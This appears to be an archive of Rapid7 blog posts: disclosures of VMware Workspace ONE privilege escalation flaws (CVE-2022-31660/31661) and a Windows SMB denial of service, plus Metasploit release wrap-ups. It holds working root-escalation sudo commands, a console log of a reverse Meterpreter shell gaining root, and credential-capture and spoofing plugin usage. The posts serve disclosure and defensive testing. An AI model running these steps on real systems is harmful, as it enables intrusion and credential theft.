All posts by Spencer McIntyre

CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/

CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE

The VMware Workspace ONE Access, Identity Manager, and vRealize Automation products contain a locally exploitable vulnerability whereby the under-privileged horizon user can escalate their permissions to those of the root user. Notably, the horizon user runs the externally accessible web application. This means that remote code execution (RCE) within that component could be chained with this vulnerability to obtain remote code execution as the root user. At the time of this writing, CVE-2022-22954 is one such RCE vulnerability (that notably has a corresponding Metasploit module here) that can be easily chained with one or both of the issues described herein.

Product description

VMWare Workspace ONE Access is a platform that provides organizations with the means to provide their employees fast and easy access to applications they need. VMware Workspace ONE Access was formerly known as VMware Identity Manager.

Impact

These vulnerabilities are local privilege escalation flaws, and by themselves, present little risk in an otherwise secure environment. In both cases, the local user must be horizon for successful exploitation.

That said, it’s important to note that the horizon user runs the externally accessible web application, which has seen several recent vulnerabilities — namely CVE-2022-22954, which, when exploited, allows for remote code execution as the horizon user. Thus, chaining an exploit for CVE-2022-22954 with either of these vulnerabilities can allow a remote attacker to go from no access to root access in two steps.

Credit

These issues were disclosed by VMware on Tuesday, August 2, 2022 within the VMSA-2022-0021 bulletin. In June, Spencer McIntyre of Rapid7 discovered these issues while researching an unrelated vulnerability. They were disclosed in accordance with Rapid7’s vulnerability disclosure policy.

CVE-2022-31660

CVE-2022-31660 arises from the fact that the permissions on the file /opt/vmware/certproxy/bin/cert-proxy.sh are such that the horizon user is both the owner and has access to invoke this file.

To demonstrate and exploit this vulnerability, that file is overwritten, and then the following command is executed as the horizon user:

sudo /usr/local/horizon/scripts/certproxyService.sh restart

Note that, depending on the patch level of the system, the certproxyService.sh script may be located at an alternative path and require a slightly different command:

sudo /opt/vmware/certproxy/bin/certproxyService.sh restart

In both cases, the horizon user is able to invoke the certproxyService.sh script from sudo without a password. This can be verified by executing sudo -n --list. The certproxyService.sh script invokes the systemctl command to restart the service based on its configuration file. The service configuration file, located at /run/systemd/generator.late/vmware-certproxy.service, dispatches to /etc/rc.d/init.d/vmware-certproxy through the ExecStart and ExecStop directives, which in turn executes /opt/vmware/certproxy/bin/cert-proxy.sh.

Proof of concept

To demonstrate this vulnerability, a Metasploit module was written and submitted on GitHub in PR #16854.

With an existing Meterpreter session, no options other than the SESSION need to be specified. Everything else will be automatically determined at runtime. In this scenario, the original Meterpreter session was obtained with the module for CVE-2022-22954, released earlier this year.

[*] Sending stage (40132 bytes) to 192.168.159.98
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400

meterpreter > sysinfo
Computer        : photon-machine
OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: horizon
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
SESSION => -1
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Backing up the original file...
[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
[*] Triggering the payload...
[*] Sending stage (40132 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400
[*] Restoring file contents...
[*] Restoring file permissions...

meterpreter > getuid
Server username: root
meterpreter >

CVE-2022-31661

CVE-2022-31660 arises from the fact that the /usr/local/horizon/scripts/getProtectedLogFiles.hzn script can be run with root privileges without a password using the sudo command. This script in turn will recursively change the ownership of a user-supplied directory to the horizon user, effectively granting them write permissions to all contents.

To demonstrate and exploit this vulnerability, we can execute the following command as the horizon user:

sudo /usr/local/horizon/scripts/getProtectedLogFiles.hzn exportProtectedLogs /usr/local/horizon/scripts/

At this point, the horizon user has write access (through ownership) to a variety of scripts that also have the right to invoke using sudo without a password. These scripts can be verified by executing sudo -n --list. A careful attacker would have backed up the ownership information for each file in the directory they intend to target and restored them once they had obtained root-level permissions.

The root cause of this vulnerability is that the exportProtectedLogs subcommand invokes the getProtectedLogs function that will change the ownership information to the TOMCAT_USER, which happens to be horizon.

Excerpt from getProtectedLogFiles.hzn:

function getProtectedLogs()
{
    chown ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION
    rm -f $TARGET_DIR_LOCATION/messages*
    rm -f $TARGET_DIR_LOCATION/boot*
    rm -rf $TARGET_DIR_LOCATION/journal*

    cp $VAR_LOG_MESSAGES* $TARGET_DIR_LOCATION
    cp $BOOT_LOG_MESSAGES* $TARGET_DIR_LOCATION
    chown -R ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION/

}

Remediation

Users should apply patches released in VMSA-2022-0021 to remediate these vulnerabilities. If they are unable to, users should segment the appliance from remote access, especially if known issues in the web front end like CVE-2022-22954 also remain unpatched.

Note that fixing these vulnerabilities helps shore up internal, local defenses against attacks targeting external interfaces. For practical purposes, these issues are merely internal, local privilege escalation issues, so enterprises running VMWare Workspace One Access installations with current patch levels should schedule updates addressing these issues as part of routine patch cycles.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to vulnerabilities described in VMSA-2022-0021 with authenticated, version-based coverage released on August 4, 2022 (ContentOnly-content-1.1.2606-202208041718).

Disclosure timeline

  • May 20, 2022 – Issue discovered by Spencer McIntyre of Rapid7
  • June 28, 2022 – Rapid7 discloses the vulnerability to VMware
  • June 29, 2022 – VMware acknowledges receiving the details and begins an * investigation
  • June 30, 2022 – VMware confirms that they have reproduced the issues, requests that Rapid7 not involve CERT for simplicity’s sake
  • July 1, 2022 – Rapid7 replies, agreeing to leave CERT out
  • July 22, 2022 – VMware states they will publish an advisory once the issues have been fixed, asks whom to credit
  • July 22, 2022 – Rapid7 responds confirming credit, inquires about a target date for a fix
  • August 2, 2022 – VMware discloses these vulnerabilities as part of VMSA-2022-0021 (without alerting Rapid7 of pending disclosure)
  • August 2, 2022 – Metasploit module submitted on GitHub in PR #16854
  • August 5, 2022 – This disclosure blog

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/07/29/metasploit-weekly-wrap-up-169/

Roxy-WI Unauthenticated RCE

Metasploit Weekly Wrap-Up

This week, community member Nuri Çilengir added an unauthenticated RCE for Roxy-WI. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. The vulnerability can be triggered by a specially crafted POST request to a Python script where the ipbackend parameter is vulnerable to OS command injection. The result is reliable code execution within the context of the web application user.

Fewer Meterpreter Scripts

Community member bcoles removed multiple Meterpreter scripts which have been deprecated for years. Metasploit’s documentation has omitted details on how to write them since 2014 and removing the existing ones in favor of their new post-module equivalents ensures users are using the most up-to-date code and workflows. Post modules have a number of advantages over Meterpreter scripts and Metasploit has equivalents for each of the Meterpreter scripts that were removed.

Helpful Suggestions

Msfconsole will now suggest datastore option names when an invalid option is specified. This should help users understand when they make a mistake and misspell an option name. The original behavior would just set the invalid option which may leave the user confused when they think they set one thing but the option did not actually change.

For example, prior to these changes setting LHSOT (instead of LHOST) the option would just be set, effectively not doing anything.

msf6 exploit(windows/smb/psexec) > set LHSOT 192.168.169.1
LHSOT => 192.168.169.1

Now the new behavior will identify that LHSOT is not valid in the current context and will suggest setting LHOST instead.

msf6 exploit(windows/smb/psexec) > set LHSOT 192.168.159.1
[-] Unknown datastore option: LHSOT. Did you mean LHOST?
msf6 exploit(windows/smb/psexec) >

New module content (1)

Enhancements and features (6)

  • #16774 from zeroSteiner – The set command has been updated so that if an invalid datastore option is provided, a suggestion will be made for a valid datastore option, where possible. Additionally, the behavior has been changed so that one can no longer set a datastore value that is not valid within the given content.
  • #16798 from bcoles – The deprecated scripts/meterpreter/pml_driver_config.rb script has been removed from Metasploit since Metasploit scripts have been deprecated for over 5 years now. Please use exploit/windows/local/service_permissions instead which contains a more modern implementation of the same principle this exploit utilized.
  • #16801 from bcoles – The deprecated scripts/meterpreter/schelevator.rb script has been removed in favor of exploit/windows/local/ms10_092_schelevator. Scripts were deprecated over 5 years ago and should no longer be used.
  • #16823 from bcoles – The deprecated scripts/meterpreter/prefetchtool.rb has been removed and replaced with the post/windows/gather/enum_prefetch.rb post module.
  • #16830 from bcoles – Remove deprecated scripts/meterpreter/getvncpw.rb script in favor of the post/windows/gather/credentials/vnc post module which is more modern and has more features.
  • #16831 from bcoles – Remove the deprecated scripts/meterpreter/get_env.rb in favor of the post/multi/gather/env post module.

Bugs fixed (6)

  • #16094 from 3V3RYONE – A bug has been fixed in the pg_ctl.rb helper whereby it was possible that initializing and starting databases using msfdb init might fail due to the pg_ctl.rb helper not properly setting unix_socket_directories to a path that a non-root user can write to. This code has now been updated so that it will set the unix_socket_directories setting to a path that the current user can write to or will error out if it cannot find a writeable directory to use for the socket file.
  • #16668 from sempervictus – A bug has been fixed in the HTTP crawler module and its associated library whereby the code expected an object to be populated when it may not be. This has been fixed with additional validation.
  • #16810 from entity0xfe – The host command has been updated to fix a bug whereby the -t flag was not properly accepting the <tag> parameter that it was supposed to accept and process. Additionally, the documentation for this option has been updated to be clearer.
  • #16817 from jmartin-r7 – Several modules and libraries were previously calling Msf::Config.get_config_root which did not properly account for changes to the configuration path that the user might make. These calls have been replaced with calls to Msf::Config.config_directory which will appropriately take the user’s configuration settings into account.
  • #16819 from adfoster-r7 – A bug has been fixed whereby running the hosts command with the -c flag to filter by columns would result in a stack trace. The command now correctly returns the output with only the columns specified to the -c flag.
  • #16824 from bcoles – A bug has been fixed in the is_admin? and is_system? post exploitation methods, which previously incorrectly reported the user as always being an administrator and a system user respectively when run on shell sessions.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/06/14/cve-2022-32230-windows-smb-denial-of-service-vulnerability-fixed/

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

A remote and unauthenticated attacker can trigger a denial-of-service condition on Microsoft Windows Domain Controllers by leveraging a flaw that leads to a null pointer deference within the Windows kernel. We believe this vulnerability would be scored as CVSSv3 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H or 7.5. This vulnerability was silently patched by Microsoft in April of 2022 in the same batch of changes that addressed the unrelated CVE-2022-24500 vulnerability.

Credit

This issue was fixed by Microsoft without disclosure in April 2022, but because it was originally classed as a mere stability bug fix, it did not go through the usual security issue process. In May, Spencer McIntyre of Rapid7 discovered this issue while researching the fix for CVE-2022-24500 and determined the security implications of CVE-2022-32230. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

CVE-2022-32230 is caused by a missing check in srv2!Smb2ValidateVolumeObjectsMatch to verify that a pointer is not null before reading a PDEVICE_OBJECT from it and passing it to IoGetBaseFileSystemDeviceObject. The following patch diff shows the function in question for Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left).

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

This function is called from the dispatch routine for an SMB2 QUERY_INFO request of the FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION class. Per the docs in MS-SMB2 section 3.3.5.20.1 Handling SMB2_0_INFO_FILE, FILE_NORMALIZED_NAME_INFORMATION is only available when the dialect is 3.1.1.

For FileNormalizedNameInformation information class requests, if not supported by the server implementation<392>, or if Connection.Dialect is "2.0.2", "2.1" or "3.0.2", the server MUST fail the request with STATUS_NOT_SUPPORTED.

To trigger this code path, a user would open any named pipe from the IPC$ share and make a QUERY_INFO request for the FILE_NORMALIZED_NAME_INFORMATION class. This typically requires user permissions or a non-default configuration enabling guest access. This is not the case, however, for the noteworthy exception of domain controllers where there are multiple named pipes that can be opened anonymously, such as netlogon. An alternative named pipe that can be used but does typically require permissions is the srvsvc pipe.

Under normal circumstances, the FILE_NORMALIZED_NAME_INFORMATION class would be used to query the normalized name information of a file that exists on disk. This differs from the exploitation scenario which queries a named pipe.

A system that has applied the patch for this vulnerability will respond to the request with the error STATUS_NOT_SUPPORTED.

Proof of concept

A proof-of-concept Metasploit module is available on GitHub. It requires Metasploit version 6.2 or later.

Impact

The most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition. Given the current state of the art of exploitation, it is assumed that a null pointer dereference in the Windows kernel is not remotely exploitable for the purpose of arbitrary code execution without combining it with another, unrelated vulnerability.

In the default configuration, Windows will automatically restart after a BSOD.

Remediation

It is recommended that system administrators apply the official patches provided by Microsoft in their April 2022 update. If that is not possible, restricting access and disabling SMB version 3 can help remediate this flaw.

Disclosure timeline

April 12th, 2022 – Microsoft patches CVE-2022-32230
April 29th, 2022 – Rapid7 finds and confirms the vulnerability while investigating CVE-2022-24500
May 4th, 2022 – Rapid7 contacts MSRC to clarify confusion regarding CVE-2022-32230
May 18th, 2022 – Microsoft responds to Rapid7, confirming that the vulnerability now identified as CVE-2022-32230 is different from the disclosed vulnerability CVE-2022-24500 with which it was patched
June 1, 2022 — Rapid7 reserves CVE-2022-32230 after discussing with Microsoft
June 14th, 2022 – Rapid7 releases details in this disclosure, and Microsoft publishes its advisory

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/04/15/metasploit-wrap-up-152/

Meterpreter Debugging

Metasploit Weekly Wrap-Up

A consistent message Metasploit hears from users is that debugging and general logging support could be improved. The gaps in functionality make it difficult for users to understand what happens when things go wrong and for new and existing developers to fix bugs and add new features. The Metasploit team has been trying to improve this in various parts of the framework, the most recent being Meterpreter. Meterpreter payloads now have additional debugging options that can be used to inspect the internal workings of the payload as it is running. These options include MeterpreterDebugLogging, which can be used to select where the log file is placed on the remote machine, and MeterpreterDebugBuild, which controls whether or not the deployed Meterpreter supports debugging. For many Meterpreter builds, the additional debugging information would include large, easily signature-able strings that should not be present for typical operations. For this reason, users on active engagements that do not require additional logging should leave this setting off.

This functionality pairs nicely with the recently added SessionTlvLogging option, which can display the C2 traffic used by Meterpreter. With these options, both the internal state and the individual requests and responses can be inspected to understand what is happening. This should hopefully contribute to making Meterpreter a little less enigmatic.

WordPress Library Improvement

Metasploit contains quite a few modules targeting various WordPress vulnerabilities, many of which are in plugins. Almost all of these modules utilize the common WordPress library that Metasploit provides. This week that library was improved to properly handle target WordPress configurations that do not place the REST API under the standard /index.php/ path. This should improve the reliability of these modules by properly accounting for the target’s configuration.

Enhancements and features (5)

  • #16377 from sjanusz-r7 – The Python Meterpreter payload now supports creation of a debug build with the MeterpreterDebugBuild datastore option. By default logging will be output to the console that the payload was run in. A new MeterpreterDebugLogging datastore option allows writing these log files on the host that ran the payload.
  • #16396 from sjanusz-r7 – The PHP Meterpreter payload now supports creation of a debug build with the MeterpreterDebugBuild datastore option. By default logging will be output to the console the payload was run in. A new MeterpreterDebugLogging datastore option allows for writing these log files on the host that ran the payload.
  • #16411 from jmartin-r7 – Improves the RPC analyze host functionality to return additional module suggestion metadata such as invalid options or missing module requirements.
  • #16418 from adfoster-r7 – This adds the boilerplate for placing the debugging Meterpreter sessions wiki page to the docs site.
  • #16451 from dwelch-r7 – This ensures that if MeterpreterDebugBuild is enabled, that the debug versions of the extensions are also used. This allows extensions can now also output debug messages visible via tools such as dbgview, which can be helpful when debugging payloads or Meterpreter extensions.

Bugs fixed (2)

  • #16221 from gwillcox-r7 – This fixes WordPress support to work with sites where the REST API is not under /index.php/.
  • #16455 from adfoster-r7 – This removed the requirement for railgun support in modules that used the Post::File mixin, enabling better identification of modules usable against an existing session.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/03/25/metasploit-weekly-wrap-up-154/

Capture Plugin

Metasploit Weekly Wrap-Up

Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the auxiliary/server/capture. Users can start and configure each of these modules individually, but now the capture plugin can streamline the process. The capture plugin can easily start 13 different services (17 including SSL enabled versions) on the same listening IP address including remote interfaces via Meterpreter. A configuration file can be used to select individual services to start and once finished, all services can easily be stopped using a single command.

To use the plugin, it must first be loaded. That will provide the captureg command (for Capture-Global) which then offers start and stop subcommands. In the following example, the plugin is loaded, and then all default services are started on the 192.168.159.128 interface.

msf6 > load capture
[*] Successfully loaded plugin: Credential Capture
msf6 > captureg start --ip 192.168.159.128
Logging results to /home/smcintyre/.msf4/logs/captures/capture_local_20220325104416_589275.txt
Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_20220325104416_612808
[+] Authentication Capture: DRDA (DB2, Informix, Derby) started
[+] Authentication Capture: FTP started
[+] HTTP Client MS Credential Catcher started
[+] HTTP Client MS Credential Catcher started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: MSSQL started
[+] Authentication Capture: MySQL started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: PostgreSQL started
[+] Printjob Capture Service started
[+] Authentication Capture: SIP started
[+] Authentication Capture: SMB started
[+] Authentication Capture: SMTP started
[+] Authentication Capture: Telnet started
[+] Authentication Capture: VNC started
[+] Authentication Capture: FTP started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: SMTP started
[+] NetBIOS Name Service Spoofer started
[+] LLMNR Spoofer started
[+] mDNS Spoofer started
[+] Started capture jobs
msf6 >

NATed Services

This week Metasploit added features to libraries that provide listening services like HTTP, FTP, LDAP, etc. that allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules to be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that’s provided by the reverse_tcp and reverse_http(s) payload stagers.

When a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won’t be able to bind to it. To fix that, users can now set the ListernBindAddress option to one that Metasploit can listen on. In this case, the IP address that the router will forward the incoming connection to.

For example, with the network configuration:

Private IP: 172.31.21.26 (where Metasploit can bind to)
External IP: 10.2.3.4 (where the target connects to Metasploit)

The Metasploit module commands would be:

set srvhost 10.2.3.4
set ListenerBindAddress 172.31.21.26

set lhost 10.2.3.4
set ReverseListenerBindAddress 172.31.21.26

Enhancements and features (4)

  • #16249 from gwillcox-r7 – This expands on the work done in https://github.com/rapid7/metasploit-framework/pull/16164 and adds in a new library named Msf::Exploit::Remote::HTTP::Exchange which will allow for future Exchange library functions.
  • #16250 from zeroSteiner – Adds new ListenerBindPort and ListenerBindAddress options on modules which expose services such as HTTP, SMB, LDAP, FTP, etc. This allows users to specify a separate IP/Port to bind to, in addition to providing SRVHOST/SRVPORT values. These additional options are useful if Metasploit is running in a network behind a NAT, or when pivoting through a compromised target. The naming convention is similar to the payload options ReverseListenerBindAddress and ReverseListenerBindPort
  • #16298 from smashery – This adds the new "capture" plugin which can be used to easily start and stop credential-capturing services.
  • #16352 from adfoster-r7 – The discussion tag has been added to allow for more long term discussions. This will replace the existing Discussions tab, and issues marked as such will not be automatically closed.

Bugs fixed (12)

  • #16207 from h00die – The VNC libraries and associated modules have been updated to support more modern versions of VNC and to fix a few bugs so that they will work correctly with new VNC versions.
  • #16309 from HynekPetrak – This fixes an issue where the ssh_login module would crash when the channel used to execute the commands to gather the platform information reported that they failed.
  • #16317 from smashery – This fixes an issue with multiple modules that listen on UDP sockets where the modules were not closing and freeing the socket when their respective services were stopped.
  • #16325 from sjanusz-r7 – This PR replaces IO.read with File.binread, in scenarios where it’s obvious that we’re reading from binaries, to prevent an issue where not all of the file has been read correctly due to an additional EOL<->CRLF conversion that happens on Windows.
  • #16340 from bcoles – This fixes the APK injection behavior to use aapt2 if msfvenom is unable to rebuild the APK with apktool, allows more APKs to be compatible with msfvenom, and fixes a bug.
  • #16341 from h00die – This fixes a bug where the auxiliary/server/capture/vnc module would not output hashes in a format compatible with John The Ripper and a bug that was causing crashes due to assuming hashes always had an associated username. Additionally, support has been added for exporting VNC hashes into a JTR compatible format for later cracking and the hash_identify function has been updated to properly identify VNC hashes allowing for better hash detection.
  • #16353 from jmartin-r7 – A bug has been fixed in the Anemone library and in the HTTP crawler libraries and related module to allow pulling and setting of ssl_version from standardized options. This permits fine-grained user control and avoids issues related to missing or depreciated SSL versions in newer Ruby versions, which were at times preventing Metasploit from making successful connections to targets.
  • #16358 from bcoles – This change fixes a bug in the msfvenom APK injection code, where in some situations a suitable hook point could not be found.
  • #16367 from zeroSteiner – A bug was found in the way character escaping was done in apache_apisix_api_default_token_rce which has now been fixed. In addition, several updates have been made to better handle error cases that may occur when sending HTTP requests to the target.
  • #16368 from zeroSteiner – This improves response time when a cache miss occurs for commands not provided by msfconsole.
  • #16369 from sjanusz-r7 – This change fixes shell_to_meterpreter module to allow upgrading (or duplicating) Meterpreter sessions.
  • #16371 from AlanFoster – This fixes a crash in the WebSocket library used by the Kubernetes modules that would occur when a socket method was being called that’s only provided by the Rex version.
  • #16361 from bcoles – Thisadds docs for the adb_server_exec module.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/02/25/metasploit-weekly-wrap-up-2/

Exchange RCE

Metasploit Weekly Wrap-Up

Exchange remote code execution vulnerabilities are always valuable exploits to have. This week Metasploit added an exploit for an authenticated RCE in Microsoft Exchange servers 2016 and server 2019 identified as CVE-2021-42321. The flaw leveraged by the exploit exists in a misconfigured denylist that failed to prevent a serialized blob from being loaded resulting in code execution. While this is an authenticated vulnerability, a standard user has sufficient permissions to trigger it which likely encompasses most users within an organization that uses Exchange. The vulnerability affects Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2.

Chrome Password Decryption

Community member timwr updated the existing Chrome enumeration module to support decrypting passwords from modern versions of Chrome. The module can now decrypt both the new and old formats of passwords. This is helpful because when Chrome is updated, passwords in the old format are not updated to the new format.

New module content (2)

  • Microweber CMS v1.2.10 Local File Inclusion (Authenticated) by Talha Karakumru – Adds a new module auxiliary/gather/microweber_lfi which targets Microweber CMS v1.2.10 and allows authenticated users to read arbitrary files on disk.
  • Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE by Grant Willcox, Microsoft Security Response Center, Microsoft Threat Intelligence Center, peterjson, pwnforsp, testanull, and zcgonvh, which exploits CVE-2021-42321 – This adds an exploit for CVE-2021-42321 which is an authenticated RCE in Microsoft Exchange. The vulnerability is related to a misconfigured deny-list that fails to properly prevent malicious serialized objects from being loaded, leading to code execution.

Enhancements and features

  • #16061 from shoxxdj – The wordpress_scanner module has been updated to support enumerating WordPress users using the wp-json API.
  • #16200 from timwr – This updates post/windows/enum_chrome to support decrypting stored passwords for Chrome versions greater than 80.

Bugs fixed

  • #16197 from adfoster-r7 – This fixes an edge case when reading files on Windows, and fixes Ruby 3 crashes when reading files.
  • #16215 from bwatters-r7 – This updates payloads version to 2.0.75, taking in the changes landed in https://github.com/rapid7/metasploit-payloads/pull/542 and fixes a bug in Windows Meterpreter getsystem command where a failed attempt to elevate can result in a partially-broken session.
  • #16093 from h00die – A number of broken URL references have been fixed in Metasploit modules. In addition, the tools/modules/module_reference.rb code has been updated to log redirects so that they can be appropriately triaged later and to support saving results to a CSV file. Finally, several modules had their code adjusted to conform to RuboCop standards.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit 2021 Annual Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/01/05/metasploit-2021-annual-wrapup/

Metasploit 2021 Annual Wrap-Up

As 2022 kicks off, we now have another year in the books. Like years past, 2021 brought some surprises and had its share of celebrity vulnerabilities and recurring trends. Let’s highlight some statistics!

Quick stats

  • 651 merged pull requests from 113 users
  • 184 new modules
    • 102 exploits, 45 post, 32 auxiliary, 3 payload, and 2 evasion
  • 1 Metasploit Community CTF hosted
    • 1,501 users registered across 727 teams
    • 18 total challenges
    • 1,264 correct challenge submissions

URI support

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

use exploit/linux/postgres/postgres_payload
run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console — it will also make it easier to share cheat sheets among pentesters. Support includes HTTP, MySQL, PostgreSQL, SMB, SSH, and more; check out the full announcement post.

Sessions without payloads

Metasploit 2021 Annual Wrap-Up

AV evasion is a hard problem that’s not going to be solved in the foreseeable future. Payloads are caught in a variety of ways by a variety of AVs. One sustainable approach Metasploit is attempting to take is to enable users to leverage sessions that don’t require payload code to be running on the target. While not always a feasible solution, when it is, it can be quite reliable.

Earlier in 2021, community member smashery took on a large effort to enable Metasploit users to obtain interactive command shell sessions using Microsoft’s WinRM. The result is an improvement that enables the scanner/winrm/winrm_login module to open a command shell session without having uploaded a payload to the target. This session can then of course be used with post modules that are compatible with shell payloads.

msf6 auxiliary(scanner/winrm/winrm_login) > run username=Administrator password=pass rhost=192.168.123.15

[!] No active DB -- Credential data will not be saved!
[+] 192.168.123.15:5985 - Login Successful: WORKSTATION\Administator:pass
[*] Command shell session 4 opened (192.168.123.1:50321 -> 192.168.123.15:5985 ) at 2021-12-17 14:14:25 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

In a similar vein, Metasploit has for a while now had the ability to open command shell sessions from the scanner/ssh/ssh_login module. These command shell sessions could also be used with post modules that didn’t require full Meterpreter sessions. However, one notable feature that SSH servers did not support until 2021 was the ability to port-forward over these connections. Last year saw improvements to Metasploit’s handling of SSH sessions that enable both standard port forwarding (for client connections) and reverse port forwarding (for server connections). Being fully wired into Metasploit, so to speak, means users can forward connections over them using the route command in the same way they can with Meterpreter sessions.

We hope these new capabilities provide users with more options to perform their testing from Metasploit while keeping payloads entirely out of memory.

Evasion modules

Evasion modules are one of Metasploit’s most infrequently added types, but they are certainly noteworthy when they are added. Last year saw two such modules added, both targeting Windows executables. The first module, based on Johnny Shaw’s work, implemented Process Herpaderping. This novel technique obfuscates the payload’s main logic from security products. This technique was effective for a few months but was ultimately added as a detection to Windows Defender.

Another evasion module added this year was kensh1ro’s syscall module. Using direct system calls is a popular technique to evade user-mode analysis hooks, and this module brings the capability to Metasploit, too.

RDLL exploit improvements

Last year, the post exploit library used by quite a few Windows local exploits saw a great improvement that reduced code reuse and laid the foundation to randomize the target process used to host the injected DLL. Prior to this, most exploits would start notepad using a piece of template code that would then load the RDLL and, when successful, execute the payload. This often led to the notepad process making network calls, which is pretty easily identified as malicious behavior. Instead, these modules will now randomly select a binary from a list and automatically start a process of the correct architecture. No more notepad instances making network calls from exploits. Currently, the new implementation will randomly select between msiexec and netsh, both of which are widely available across Windows versions and are less likely to be identified when making network connections.

Kubernetes support

It’s safe to say that cloud computing is here to stay. Metasploit added the first modules that target the Kubernetes platform. The first module is an auxiliary module that is capable of enumerating namespace, pod, and secret information. Following up on that is an exploit module that, when provided the necessary credentials, can execute a payload within a pod. In a similar vein to the previously mentioned payload-less post-exploitation capabilities, this module can also open a direct command shell session using a new, native WebSocket implementation. We hope these modules help Metasploit users who are testing these environments and look forward to expanding on the capabilities in 2022.

Session validation

Being a framework, Metasploit offers a variety of payloads and session types. Unfortunately, not every payload yields a session type with the same capabilities (e.g. the PHP Meterpreter does not offer Kiwi). This can be very confusing for users as they’re attempting to use various post modules and Meterpreter commands. Last year, Metasploit improved the way this is handled and now offers concise error messages when certain capabilities are missing or can’t be performed with a particular session type. Now running a Meterpreter command that’s either unsupported or provided by an extension that hasn’t been loaded will be reported as such.

meterpreter > creds_all
[-] The "creds_all" command requires the "kiwi" extension to be loaded (run: `load kiwi`)
meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (python/osx)
[-] The "kiwi" extension is supported by the following Meterpreter payloads:
[-]   - windows/x64/meterpreter*
[-]   - windows/meterpreter*

Improved SMB capture server

